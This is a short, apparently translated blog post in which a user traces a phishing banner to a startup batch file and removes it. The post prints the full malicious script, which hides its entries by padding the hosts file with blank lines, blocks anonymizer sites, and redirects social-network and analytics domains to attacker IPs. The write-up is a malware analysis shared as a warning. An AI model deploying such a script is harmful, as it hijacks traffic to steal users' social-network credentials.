Easy penetration or struggle with a simple virus

An exciting action takes place on your computer quite unexpectedly and, as a rule, at the most inopportune moment. It all starts simply, you go to your favorite site or social network and find something unusual ...

It happened with my computer. I go to the site, I see an indecent picture (advertising banner) in the left corner. 2 thoughts flashed through my head:
  • my browser is infected
  • the site is infected

After wandering around several sites and not seeing this banner itself, I concluded that the site is still infected. Since this was the site of a fairly large company, I called those. support. They listened, expressed gratitude for vigilance, but during the conversation they reported that they did not have this banner displayed under any browser.

Site analysis

I began to research the site, and I see that there is such a line in the Yandex metric code:


It is she who shows the banner. It’s not entirely clear how this is done in the tag, but it’s clear that the link to the image is phishing.

Hosts file

We are sent to the hosts file (% windir% \ system32 \ drivers \ etc \ hosts).
And here I made a serious mistake : opened, looked, the whole number, closed. However, I did not pay attention to the scroll bar that appeared .

Autoload

We go to startup (Start-> Run-> msconfig) and find the file start.bat with the following contents:

FOR /L %%i IN (1,1,255) DO echo. >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 obhodilka.ru raskruty.ru jelya.ru pinun.ru websplatt.ru diazoom.ru anonim.ttu.su >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 webvpn.org unboo.ru anonim.do.am anonimvk.ru nemir.ru vkanonim.ru nezayti.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 webmurk.ru waitplay.ru dostupest.ru anonimix.ru nekontakt2.ru hellhead.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 razblokirovatdostup.ru antiblock.ru dardan.ru o.vhodilka.ru cameleo.ru spoolls.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 adminimus.ru netdostupa.com dostyp.ru anonymizer.ru xy4-anonymizer.ru v.vhodilka.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 vhodilka.ru ok-anonimaizer.ru neklassniki.ru timp.ru urlbl.ru workandtalk.ru >> %windir%\system32\drivers\etc\hosts
echo 46.251.249.137 m.odnoklassniki.ru my.mail.ru www.odnoklassniki.ru vk.com odnoklassniki.ru m.vk.com wap.odnoklassniki.ru >> %windir%\system32\drivers\etc\hosts
echo 46.251.249.136 mc.yandex.ru admulti.com counter.rambler.ru counter.spylog.com www.google-analytics.com >> %windir%\system32\drivers\etc\hosts.txt


It becomes clear that the first line of a batch file in hosts creates 255 empty lines. That is why, looking at the hosts, I did not see anything. It was necessary to go to the very end to notice the modification.

Thus, on all sites on which Google Analytics and Yandex metrics stood, this banner appeared. And in all social networks, a phishing site was attached, where you could easily provide access to your page to the "enemy".

It was necessary to remove the batch file from the startup, clean the hosts, as everything fell into place. The way the pest penetrated the computer remained a mystery.

Conclusion

In this whole story, the following remains surprising:
  • Kaspersky Anti-Virus was installed on the computer, which did not show any signs of a struggle with the modification of the hosts file, adding a batch file to startup, and the appearance of a banner (even after a full scan).
  • OS Windows 7 quite calmly allowed to execute start.bat at each boot.

Also popular now: